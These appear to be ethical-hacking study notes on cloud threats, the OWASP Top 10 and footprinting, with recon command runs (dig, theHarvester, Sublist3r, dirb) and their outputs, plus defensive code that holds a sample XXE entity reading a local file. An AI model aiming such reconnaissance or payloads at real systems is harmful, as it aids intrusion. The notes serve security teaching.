*The NIST cloud computing reference architecture (NIST SP 500-292) defines five major actors; each actor is an entity (a person or an organization) that participates in a transaction or process and/or performs tasks in cloud computing.*

- **Cloud Consumer** - A person or org. that maintains a business relationship with, and uses services from, Cloud Providers; acquires and uses cloud products and services.
- **Cloud Provider** - A person, org. or entity responsible for making a service available; purveyor of products and services.
- **Cloud Auditor** - Independent assessor of cloud services and security controls.
- **Cloud Broker** - Manages use, performance and delivery of services as well as relationships between Cloud Providers and Cloud Consumers.
- **Cloud Carrier** - Organization responsible for transferring data; intermediary that provides connectivity and transport of cloud services from Cloud Providers to Cloud Consumers (e.g.: telecoms).

> ⚠️ - **FedRAMP** - regulatory effort regarding cloud computing

> ⚠️ - **PCI DSS** - deals with debit and credit cards, but also has a cloud SIG

## Five characteristics of cloud computing

***The National Institute of Standards and Technology (NIST)** defines cloud computing as it is known today through five particular characteristics.*

1. **On-demand self-service**
2. **Broad network access**
3. **Multi-tenancy and resource pooling**
4. **Rapid elasticity and scalability**
5. **Measured service**

## Threats:

- **Data Breach or Loss** - Biggest threat; includes malicious theft, erasure or modification
- **Shadow IT** - IT systems or solutions that are developed to handle an issue but aren't taken through the proper approval chain
- **Abuse of Cloud Resources** - Another high threat (usually applies to IaaS and PaaS)
- **Insecure Interfaces and APIs** - Cloud services can't function without them, but you need to make sure they are secure
- **Service Oriented Architecture** - API that makes it easier for application components to cooperate and exchange information
- **Insufficient due diligence** - Moving an application without knowing the security differences
- **Shared technology issues** - Multitenant environments that don't provide proper isolation
- **Unknown risk profiles** - Subscribers simply don't know what security provisions are made in the background
- **Wrapping Attack** - SOAP message intercepted and data in the envelope is changed and sent/replayed
- **Session riding** - CSRF under a different name; deals with cloud services instead of traditional data centers
- **Others include malicious insiders, inadequate design and DDoS**
- Other threats:
  - Loss/compromise of encryption keys
  - Isolation failure
  - Compliance risk
  - VM vulnerabilities
  - Vendor lock-in
  - Jurisdictional issues based on changing geographic boundaries
  - E-discovery/subpoena
  - Cloud service termination/failure
  - Improper/incomplete data handling & disposal
  - Management network failure/interface compromise

## Attacks:
1. Service hijacking via social engineering & network sniffing
2. Session hijacking using XSS
3. DNS attacks
4. Side channel attacks (e.g.: using an existing VM on the same physical host to attack another)
5. Cross-VM attacks
6. SQL injection
7. Cryptanalysis attacks
8. Wrapping attacks - performed during the translation of SOAP messages in the TLS layer; attackers duplicate the body of the message and send it to the targeted server impersonating the legitimate user.
9. DoS/DDoS attack
10. Man-in-the-Cloud attacks - abuse of cloud file synchronization services by tricking the user into installing malicious software that places the attacker's synchronization token for the service on their machine, allowing the attacker to steal the user's token and gain access to their files.

## OWASP Top 10 Application Security Risks

1. **Injection** - Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
   - Input validation
   - Limit account privileges

2. **Broken Authentication** - Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

3. **Sensitive Data Exposure** - Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

4. **XML External Entities (XXE)** - Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
   - If your application uses SAML for identity processing with federated security or Single Sign-On (SSO). SAML uses XML.
   - If the application accepts XML directly or XML uploads from untrusted sources, or inserts untrusted data into XML documents.
   - If any of the XML processors in the application or SOAP-based web services have DTDs enabled.

5. **Broken Access Control** - Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access rights, etc.

6. **Security Misconfiguration** - The most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.

7. **Cross-Site Scripting (XSS)** - Occurs whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
   - Reflected XSS
   - Stored XSS
   - DOM XSS

8. **Insecure Deserialization** - Often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

9. **Using Components with Known Vulnerabilities** - Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

10. **Insufficient Logging & Monitoring** - Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data. Most breach studies show the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

## Additional Attacks
1. **Directory Traversal** (../) - An attacker can get sensitive information like the contents of the /etc/passwd file, which contains a list of users on the server; log files, source code, access.log and so on
2. **Cross-site Request Forgery (CSRF)** - Forces an end user to execute unwanted actions on an app they're already authenticated on
   - Inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf
   - Captures the session and sends a request based off the logged-in user's credentials
   - Can be mitigated by sending **random challenge tokens**

## Cloud Security Control Layers

*The problem with cloud security is what you are allowed to test and what you should test; another concern is the hypervisor: if the hypervisor is compromised, all hosts on that hypervisor are as well.*

1. **Applications** - SDLC (software development life cycle), WAF (web application firewall)
2. **Information** - DLP, encryption
3. **Management** - GRC, IAM, Patch & Configuration
4. **Network** - NIDS/NIPS, DNSSEC, QoS
5. **Trusted Computing Model** - attempts to resolve computer security problems through hardware enhancements
   - **Roots of Trust (RoT)** - set of functions within the TCM that are always trusted by the OS
6. **Computer & Network Storage** - Encryption, host-based firewall, HIDS/HIPS
7. **Physical** - Guards, gates, fences etc.
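For the XML External Entities item in the OWASP list above, an added example (not code from the original notes): the "disable DTDs" mitigation expressed as a pre-parse check that refuses any DOCTYPE or ENTITY declaration before the document reaches the parser. The SAML-style sample documents are constructed for illustration.

```python
"""Refuse DTDs before parsing untrusted XML (XXE mitigation).

Added example; not part of the original notes. XXE needs the document to
declare entities, which requires a DOCTYPE (inline or external DTD). Legitimate
SAML/SOAP messages never need a DTD, so rejecting any DOCTYPE/ENTITY
declaration up front closes the whole class regardless of how the parser
behind it is configured. The sample documents below are constructed.
"""
import re
import xml.etree.ElementTree as ET

_DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
_SAML_NS = {"s": "urn:oasis:names:tc:SAML:2.0:assertion"}


class DtdNotAllowed(ValueError):
    """Raised when a document declares a DTD (DOCTYPE or ENTITY)."""


def has_dtd(xml_bytes: bytes) -> bool:
    """True if the raw document contains a DOCTYPE or ENTITY declaration."""
    return _DTD_MARKERS.search(xml_bytes) is not None


def parse_untrusted_xml(xml_bytes: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing DTDs before the parser runs."""
    if has_dtd(xml_bytes):
        raise DtdNotAllowed("DOCTYPE/ENTITY declarations are not accepted")
    return ET.fromstring(xml_bytes)


def is_accepted(xml_bytes: bytes) -> bool:
    """Convenience for callers that only need an accept/reject decision."""
    try:
        parse_untrusted_xml(xml_bytes)
        return True
    except (DtdNotAllowed, ET.ParseError):
        return False


def subject_name_id(xml_bytes: bytes) -> str:
    """Extract the NameID of a SAML-style assertion after the DTD check."""
    node = parse_untrusted_xml(xml_bytes).find("s:Subject/s:NameID", _SAML_NS)
    return (node.text or "") if node is not None else ""


# Constructed: a minimal SAML-like assertion with no DTD (accepted).
CLEAN_DOC = b"""<?xml version="1.0"?>
<Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
  <Subject><NameID>alice@example.test</NameID></Subject>
</Assertion>"""

# Constructed: the same assertion with an inline DTD declaring an external
# entity that points at a local file, the XXE pattern (rejected before parsing).
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE Assertion [
  <!ENTITY ext SYSTEM "file:///an/internal/file">
]>
<Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
  <Subject><NameID>&ext;</NameID></Subject>
</Assertion>"""


if __name__ == "__main__":
    print(subject_name_id(CLEAN_DOC))   # alice@example.test
    print(is_accepted(XXE_DOC))         # False
```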
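For the CSRF mitigation listed above (random challenge tokens), an added example that is not from the original notes: a per-session synchronizer token checked with a constant-time comparison. The in-memory session store and the form shape are assumptions made for illustration.

```python
"""CSRF mitigation with per-session random challenge tokens.

Added example, not part of the original notes. The in-memory session store
and the request/form shape are assumptions for illustration; a real
application keeps sessions server-side and reads the token from a hidden
form field or a request header.
"""
import hmac
import secrets

# session_id -> session data. The token lives with the session on the server,
# so a forged cross-site request, which rides the victim's cookie but cannot
# read the victim's page, has no way to learn it.
_SESSIONS: dict = {}


def create_session(user: str) -> str:
    """Start a session and mint a fresh 256-bit challenge token for it."""
    session_id = secrets.token_urlsafe(32)
    _SESSIONS[session_id] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return session_id


def csrf_token_for(session_id: str) -> str:
    """Token the page embeds in its forms (hidden field) for this session."""
    return _SESSIONS[session_id]["csrf_token"]


def is_valid_csrf(session_id: str, submitted_token: str) -> bool:
    """A state-changing request is valid only if it carries the session's token.

    hmac.compare_digest keeps the comparison constant-time so the token does
    not leak through timing differences.
    """
    session = _SESSIONS.get(session_id)
    if session is None or not submitted_token:
        return False
    return hmac.compare_digest(session["csrf_token"], submitted_token)


def handle_transfer(session_id: str, form: dict) -> str:
    """Constructed state-changing endpoint: refuse without a valid token."""
    if not is_valid_csrf(session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    user = _SESSIONS[session_id]["user"]
    return f"200 OK: transferred {form['amount']} on behalf of {user}"


def demo() -> tuple:
    """Legitimate submission (carries the token) vs. forged request (cannot)."""
    sid = create_session("alice")
    legit = handle_transfer(sid, {"amount": "10", "csrf_token": csrf_token_for(sid)})
    forged = handle_transfer(sid, {"amount": "10"})
    return legit, forged


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```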
**Tools**
- **CloudInspect** - pen-testing application for AWS EC2 users
- **CloudPassage Halo** - instant visibility and continuous protection for servers in any cloud
- **Dell Cloud Manager**
- **Qualys Cloud Suite**
- **Trend Micro's Instant-On Cloud Security**
- **Panda Cloud Office Protection**

-------------------------------------------------------------------------------- /2-Footprinting-and-Reconnaissance.md: --------------------------------------------------------------------------------

# Reconnaissance and Footprinting

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/1-Footprinting-and-Reconnaissance)**

## Footprinting
Footprinting is the part of the reconnaissance process that is used for gathering as much information as possible about a target computer system or network.

When used in the computer security lexicon, "Footprinting" generally refers to one of the pre-attack phases: tasks performed before doing the actual attack. **Some of the tools used for Footprinting are Sam Spade, nslookup, traceroute, Nmap and NeoTrace.**

## Footprinting Types: Active and Passive

- **Active** - requires the attacker to touch the device or network
  - Social engineering and other communication that requires interaction with the target
- **Passive** - measures to collect information from publicly available sources
  - Websites, DNS records, business information databases

### Footprinting helps to:

- **Know Security Posture** – The data gathered will help us get an overview of the security posture of the company, such as details about the presence of a firewall, security configurations of applications etc.

- **Reduce Attack Area** – Can identify a specific range of systems and concentrate on particular targets only. This will greatly reduce the number of systems we are focusing on.
- **Identify vulnerabilities** – We can build an information database containing the vulnerabilities, threats and loopholes present in the systems of the target organization.

- **Draw Network map** – Helps to draw a network map of the networks in the target organization covering topology, trusted routers, presence of servers and other information.

Footprinting could be both **passive** and **active**. Reviewing a company's website is an example of passive footprinting, whereas attempting to gain access to sensitive information through social engineering is an example of active information gathering.

During this phase, a hacker can collect the following information (only high-level information):

- **Domain name**
- **IP Addresses**
- **Namespaces**
- **Employee information**
- **Phone numbers**
- **E-mails**
- **Job Information**

Can be:
- **Anonymous** - information gathering without revealing anything about yourself
- **Pseudonymous** - making someone else take the blame for your actions

**Competitive Intelligence** - information gathered by businesses about competitors

**Alexa.com** - resource for statistics about websites

## Footprinting Objectives

- **Network**
  - DNS
  - IP networks
  - Accessible Systems
  - Websites
  - Access Control
  - VPN Endpoints
  - Firewall vendors
  - IDS Systems
  - Routing/Routed Protocols
  - Phone System (Analog/VoIP)

- **Organization**
  - Org Structure
  - Websites
  - Phone Numbers
  - Directory Information
  - Office Locations
  - Company History
  - Business Associations

- **Hosts**
  - Listening Services
  - Operating System Versions
  - Internet Reachability
  - Enumerated Information
  - SNMP Info
  - Users/Groups
  - Mobile Devices

## Methods and Tools

### Search Engines
- **[NetCraft](https://www.netcraft.com/)** - Blueprints a comprehensive list of information about the technologies and other details of the target website.
  - ![netcraft](https://i0.wp.com/hackingblogs.com/wp-content/uploads/2018/01/Capture-min-2.png)
- **Job Search Sites** - Information about technologies can be gleaned from job postings.
- **Google search | Google dorks:**
  - `filetype:` - looks for file types
  - `index of` - directory listings
  - `info:` - contains Google's information about the page
  - `intitle:` - string in title
  - `inurl:` - string in URL
  - `link:` - finds linked pages
  - `related:` - finds similar pages
  - `site:` - finds pages specific to that site
  - **Example**:
    - ![google-dorks](https://miro.medium.com/max/659/0*GGRvHnh59qi5lVB9.png)
  - [GHDB](https://www.exploit-db.com/google-hacking-database) is very good for learning Google Dorks and how it's done in real-world scenarios
- **Metagoofil** - Command-line tool that uses **Google hacks** to find information in meta tags (domain, filetype, etc.; it is Google dorks for the terminal).

### Website Footprinting

- **Web mirroring | Website Cloning** - allows for discreet testing offline
  - **HTTrack** - *you can use the CLI version or the Web Interface version*
  - **Wget** - Linux command
    - `wget -mk -w 10 http://hackthissite.org/`
  - **Black Widow**
  - **WebRipper**
  - **Teleport Pro**
  - **Backstreet Browser**
- **Archive.org / [Wayback machine](https://archive.org/web/)**
  - Provides cached websites from various dates, which possibly have sensitive information that has since been removed.
  - **Wayback Machine -> Google.com**:
    - ![wayback](https://searchengineland.com/figz/wp-content/seloads/2011/01/archive41-500x256.png)

### Email Footprinting

- **Email header** - may show servers and where those servers are located
  - Email headers can provide: **Names, Addresses (IP, email), Mail servers, Time stamps, Authentication and so on.**
  - ![emailheader](https://www.wikihow.com/images/thumb/7/72/Read-Email-Headers-Step-7.jpg/v4-460px-Read-Email-Headers-Step-7.jpg.webp)
- **EmailTrackerPro** is Windows software that traces an email back to its true point of origin:
  - ![emailtrackerpro](http://www.emailtrackerpro.com/support/v9/tutorials/images/traceheader/3.png)
- **Email tracking** - services can track various bits of information including the IP address of where it was opened, where it went, etc.

### DNS Footprinting

- Ports
  - Name lookup - UDP 53
  - Zone transfer - TCP 53
- Zone transfer replicates all records
- **Name resolvers** answer requests
- **Authoritative Servers** hold all records for a namespace
- **DNS Record Types**

| Name  | Description        | Purpose                                        |
| ----- | ------------------ | ---------------------------------------------- |
| SRV   | Service            | Points to a specific service                   |
| SOA   | Start of Authority | Indicates the authoritative NS for a namespace |
| PTR   | Pointer            | Maps an IP to a hostname                       |
| NS    | Nameserver         | Lists the nameservers for a namespace          |
| MX    | Mail Exchange      | Lists email servers                            |
| CNAME | Canonical Name     | Maps a name to an A record                     |
| A     | Address            | Maps a hostname to an IP address               |

- **DNS Poisoning** - changes the cache on a machine to redirect requests to a malicious server
- **DNSSEC** - helps prevent DNS poisoning by encrypting records
- **SOA Record Fields**
  - **Source Host** - hostname of the primary DNS
  - **Contact Email** - email of the person responsible for the zone file
  - **Serial Number** - revision number that increments with each change
  - **Refresh Time** - time in which an update should occur
  - **Retry Time** - time that an NS should wait on a failure
  - **Expire Time** - time in which a zone transfer is allowed to complete
  - **TTL** - minimum TTL for records within the zone

- **IP Address Management**
  - **ARIN** - North America
  - **APNIC** - Asia Pacific
  - **RIPE** - Europe, Middle East
  - **LACNIC** - Latin America
  - **AfriNIC** - Africa

- **Whois** - obtains registration information for the domain from the command line or a web interface.
  - on Kali, whois is pre-installed on the CLI; e.g.: `whois google.com`
  - on Windows, you can use the **SmartWhois** GUI software to perform a whois, or any website like domaintools.com
- **Nslookup** - Performs DNS queries (nslookup is pre-installed on Kali Linux)
  - `nslookup www.hackthissite.org`

```
Server:		192.168.63.2
Address:	192.168.63.2#53

Non-authoritative answer:
Name:	www.hackthissite.org
Address: 137.74.187.103
Name:	www.hackthissite.org
Address: 137.74.187.102
Name:	www.hackthissite.org
Address: 137.74.187.100
Name:	www.hackthissite.org
Address: 137.74.187.101
Name:	www.hackthissite.org
Address: 137.74.187.104
```

The first two lines show my current DNS server; the IP addresses returned are '**A records**', meaning the IPv4 address of the domain; at the bottom, nslookup queries the specified DNS server and retrieves the requested records that are associated with the domain.
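As an added example that is not part of the original notes: a parser for the nslookup output layout shown above, which separates the resolver header from the answer records and classifies A versus AAAA answers; it also extracts the SOA fields listed above from an interactive-mode SOA query, whose output layout is assumed here and whose values are constructed.

```python
"""Parse nslookup output into structured records.

Added example; not from the original notes. It handles the layout nslookup
prints on Kali/Linux: a Server/Address header naming the resolver, an optional
"Non-authoritative answer:" marker, then either Name/Address pairs (A, AAAA
records) or an indented "field = value" block (SOA). The A sample reuses the
addresses shown above; the SOA sample and its layout are constructed from
nslookup's usual SOA formatting (an assumption).
"""
import ipaddress
import re
from dataclasses import dataclass, field

_RESOLVER_RE = re.compile(r"^Server:\s*(\S+)$")
_NAME_RE = re.compile(r"^Name:\s*(\S+)$")
_ADDR_RE = re.compile(r"^Address:\s*(\S+?)(?:#\d+)?$")
_SOA_FIELD_RE = re.compile(r"^\s+([a-z ]+?)\s*=\s*(\S+)$")

# nslookup's SOA labels mapped onto the SOA field names listed above.
_SOA_NAMES = {
    "origin": "source_host", "mail addr": "contact_email",
    "serial": "serial_number", "refresh": "refresh_time",
    "retry": "retry_time", "expire": "expire_time", "minimum": "ttl",
}


@dataclass
class LookupResult:
    resolver: str = ""              # DNS server that answered (header lines)
    authoritative: bool = True      # False if "Non-authoritative answer:" seen
    records: list = field(default_factory=list)   # (name, "A"/"AAAA", address)
    soa: dict = field(default_factory=dict)       # SOA fields, when queried


def _rr_type(address: str) -> str:
    """Classify an answer address as an A (IPv4) or AAAA (IPv6) record."""
    try:
        return "AAAA" if ipaddress.ip_address(address).version == 6 else "A"
    except ValueError:
        return "UNKNOWN"


def parse_nslookup(output: str) -> LookupResult:
    """Parse one nslookup response (A, AAAA or SOA query) into a LookupResult."""
    result = LookupResult(authoritative="Non-authoritative answer:" not in output)
    current_name = None
    for line in output.splitlines():
        m = _RESOLVER_RE.match(line)
        if m:
            result.resolver = m.group(1)
            continue
        m = _NAME_RE.match(line)
        if m:
            current_name = m.group(1)
            continue
        m = _ADDR_RE.match(line)
        if m and current_name:  # the header's "Address: ...#53" has no Name before it
            addr = m.group(1)
            result.records.append((current_name, _rr_type(addr), addr))
            continue
        m = _SOA_FIELD_RE.match(line)
        if m and m.group(1) in _SOA_NAMES:
            value = m.group(2)
            result.soa[_SOA_NAMES[m.group(1)]] = int(value) if value.isdigit() else value
    return result


def addresses(output: str, rr_type: str) -> list:
    """Just the addresses of one record type from an nslookup run."""
    return [addr for _, typ, addr in parse_nslookup(output).records if typ == rr_type]


# Sample 1: the A-record lookup shown above (three of its five answers).
SAMPLE_A = """Server:\t\t192.168.63.2
Address:\t192.168.63.2#53

Non-authoritative answer:
Name:\twww.hackthissite.org
Address: 137.74.187.103
Name:\twww.hackthissite.org
Address: 137.74.187.102
Name:\twww.hackthissite.org
Address: 137.74.187.100
"""

# Sample 2: constructed interactive-mode SOA query; the field layout is assumed.
SAMPLE_SOA = """> set type=SOA
> hackthissite.org
Server:\t\t192.168.63.2
Address:\t192.168.63.2#53

Non-authoritative answer:
hackthissite.org
\torigin = ns1.example.test
\tmail addr = hostmaster.example.test
\tserial = 2020081101
\trefresh = 3600
\tretry = 600
\texpire = 604800
\tminimum = 3600
"""

if __name__ == "__main__":
    print(addresses(SAMPLE_A, "A"))   # ['137.74.187.103', '137.74.187.102', '137.74.187.100']
    print(parse_nslookup(SAMPLE_SOA).soa)
```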
- **The following types of DNS records are especially useful with nslookup:**

| Type  | Description |
| ----- | ----------- |
| A     | the IPv4 address of the domain |
| AAAA  | the domain's IPv6 address |
| CNAME | the canonical name — allowing one domain name to map on to another. This allows more than one website to refer to a single web server. |
| MX    | the server that handles email for the domain. |
| NS    | one or more authoritative name server records for the domain. |
| TXT   | a record containing information for use outside the DNS server. The content takes the form name=value. This information is used for many things including authentication schemes such as SPF and DKIM. |

- **Nslookup - Interactive mode zone transfer** (Interactive mode allows the user to query name servers for information about various hosts and domains or to print a list of hosts in a domain).
  - `nslookup`
  - `server <name server>`
  - `set type=<record type>`
  - `<domain>`

```
nslookup
> set type=AAAA
> www.hackthissite.org
Server:		192.168.63.2
Address:	192.168.63.2#53

Non-authoritative answer:
Name:	www.hackthissite.org
Address: 2001:41d0:8:ccd8:137:74:187:103
Name:	www.hackthissite.org
Address: 2001:41d0:8:ccd8:137:74:187:102
Name:	www.hackthissite.org
Address: 2001:41d0:8:ccd8:137:74:187:101
Name:	www.hackthissite.org
Address: 2001:41d0:8:ccd8:137:74:187:100
Name:	www.hackthissite.org
Address: 2001:41d0:8:ccd8:137:74:187:104
```

- **Dig** - Unix-based command like nslookup
  - `dig <domain>`

```
dig www.hackthissite.org

; <<>> DiG 9.16.2-Debian <<>> www.hackthissite.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51391
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096
;; QUESTION SECTION:
;www.hackthissite.org.		IN	A

;; ANSWER SECTION:
www.hackthissite.org.	5	IN	A	137.74.187.104
www.hackthissite.org.	5	IN	A	137.74.187.101
www.hackthissite.org.	5	IN	A	137.74.187.100
www.hackthissite.org.	5	IN	A	137.74.187.102
www.hackthissite.org.	5	IN	A	137.74.187.103

;; Query time: 11 msec
;; SERVER: 192.168.63.2#53(192.168.63.2)
;; WHEN: Tue Aug 11 15:05:01 EDT 2020
;; MSG SIZE  rcvd: 129

```

  - To get email records specify `-t MX`
    - `dig -t MX <domain>`
  - To get a zone transfer specify `axfr`

### Network Footprinting

- The IP address range can be obtained from the regional registrar (e.g.: ARIN for America, RIPE for Europe, etc.)

- Use `traceroute` to find intermediary servers
  - traceroute uses ICMP echo in Windows (tracert)
  - traceroute is good for detecting firewalls and the network path

**Usage example**:
- **`traceroute -I nsa.gov`**
  - Specify target: `traceroute <target>`
  - In this case ICMP ECHO is used for tracerouting: `-I`

```
traceroute -I nsa.gov
traceroute to nsa.gov (104.83.73.99), 30 hops max, 60 byte packets
 1  192.168.63.2 (192.168.63.2)  0.194 ms  0.163 ms  0.150 ms
 2  * * *
 3  * * *
 4  * * *
 5  * * *
 6  * * *
 7  * * *
 8  * * *
 9  * * *
10  * * *
11  a104-83-73-99.deploy.static.akamaitechnologies.com (104.83.73.99)  42.742 ms  42.666 ms  25.176 ms

```
> ⚠️ **Windows command - `tracert`**
> ⚠️ **Linux command - `traceroute`**

## Other Relevant Tools

### **OSRFramework**

> ⚡︎ **OSRFramework has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/4-OSRFramework.md)**

Uses open source intelligence to get information about the target. *(Username checking, DNS lookups, information leaks research, deep web search, regular expression extraction, and many others)*.

### **Web Spiders**
Obtain information from the website such as pages, etc.

### **[Recon-ng](https://github.com/lanmaster53/recon-ng)**

> ⚡︎ **Recon-ng has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/3-Recon-ng.md)**

Recon-ng is a web-based open-source reconnaissance tool used to extract information from a target organization and its personnel.

It provides a powerful environment in which open-source web-based reconnaissance can be conducted automatically, quickly and thoroughly.

### **[Metasploit Framework](https://github.com/rapid7/metasploit-framework)**

> ⚡︎ **Metasploit has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/5-Metasploit-Basics.md)**

The Metasploit Framework is a tool that provides information about security vulnerabilities and aids in penetration testing and IDS signature development; **this is a huge framework that provides recon tools as well.**

### **[theHarvester](https://github.com/laramies/theHarvester)**

> ⚡︎ **theHarvester has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/6-theHarvester.md)**

theHarvester is an OSINT tool; useful for gathering information like:
- Emails
- Subdomains
- Hosts
- Employee names
- Open ports
- Banners from different public sources like search engines, PGP key servers and the SHODAN computer database.
**Usage example**:
- **`theHarvester -d www.hackthissite.org -n -b google`**
  - Issue the theHarvester command: `theHarvester`
  - Specify the domain: `-d <domain>`
  - Perform DNS lookup: `-n`
  - Specify search engine/source: `-b google`

```
theHarvester -d www.hackthissite.org -n -b google
table results already exists

*******************************************************************
*  _   _                                            _             *
* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
*                                                                 *
* theHarvester 3.1.0                                              *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* cmartorella@edge-security.com                                   *
*                                                                 *
*******************************************************************


[*] Target: www.hackthissite.org

[*] Searching Google.
	Searching 0 results.
	Searching 100 results.
	Searching 200 results.
	Searching 300 results.
	Searching 400 results.
	Searching 500 results.

[*] No IPs found.

[*] Emails found: 2
----------------------
ab790c1315@www.hackthissite.org
staff@hackthissite.org

[*] Hosts found: 7
---------------------
0.loadbalancer.www.hackthissite.org:
22www.hackthissite.org:
2522www.hackthissite.org:
253dwww.hackthissite.org:
www.hackthissite.org:137.74.187.104, 137.74.187.100, 137.74.187.101, 137.74.187.103, 137.74.187.102
x22www.hackthissite.org:

[*] Starting active queries.
137.74.187.100
[*] Performing reverse lookup in 137.74.187.0/24
module 'theHarvester.discovery.dnssearch' has no attribute 'DnsReverse'
```

### **[Sublist3r](https://github.com/aboul3la/Sublist3r)**
Sublist3r **enumerates subdomains** using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, VirusTotal, ThreatCrowd, DNSdumpster and ReverseDNS.

**Usage example**:
- **`python3 sublist3r.py -d hackthissite.org`**
  - Specify the domain: `-d <domain>`

```
python3 sublist3r.py -d hackthissite.org

                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|

                # Coded By Ahmed Aboul-Ela - @aboul3la

[-] Enumerating subdomains now for hackthissite.org
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
[-] Total Unique Subdomains Found: 41
www.hackthissite.org
admin.hackthissite.org
api.hackthissite.org
ctf.hackthissite.org
vm-005.outbound.firewall.hackthissite.org
vm-050.outbound.firewall.hackthissite.org
vm-099.outbound.firewall.hackthissite.org
vm-150.outbound.firewall.hackthissite.org
vm-200.outbound.firewall.hackthissite.org
forum.hackthissite.org
forums.hackthissite.org
git.hackthissite.org
irc.hackthissite.org
(...)
```

### [DIRB](https://tools.kali.org/web-applications/dirb)
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack/brute force attack against a web server and analyzing the response.
- Useful to find subdirectories on a web application

**Usage example**:
- **`dirb https://www.hackthissite.org/ /usr/share/wordlists/dirb/small.txt`**
  - Specify the URL by issuing the dirb command: `dirb <url>`
  - Specify the wordlist: `/path/to/wordlist`

```
dirb https://www.hackthissite.org/ /usr/share/wordlists/dirb/small.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: https://www.hackthissite.org/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt

-----------------

GENERATED WORDS: 959

---- Scanning URL: https://www.hackthissite.org/ ----
+ https://www.hackthissite.org/api (CODE:200|SIZE:10)
+ https://www.hackthissite.org/blog (CODE:200|SIZE:20981)
+ https://www.hackthissite.org/cgi-bin/ (CODE:403|SIZE:199)
```

### Maltego

> ⚡︎ **Maltego has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/2-Maltego-Basics.md)**

Maltego is a powerful OSINT tool; you can extract a broad range of information about the network, technologies and personnel (email, phone number, Twitter).
- You are able to:
  - Identify IP address
  - Identify Domain and Domain Name Schema
  - Identify Server Side Technology
  - Identify Service Oriented Architecture (SOA) information
  - Identify Name Server
  - Identify Mail Exchanger
  - Identify Geographical Location
  - Identify Entities
  - Discover Email addresses and Phone numbers

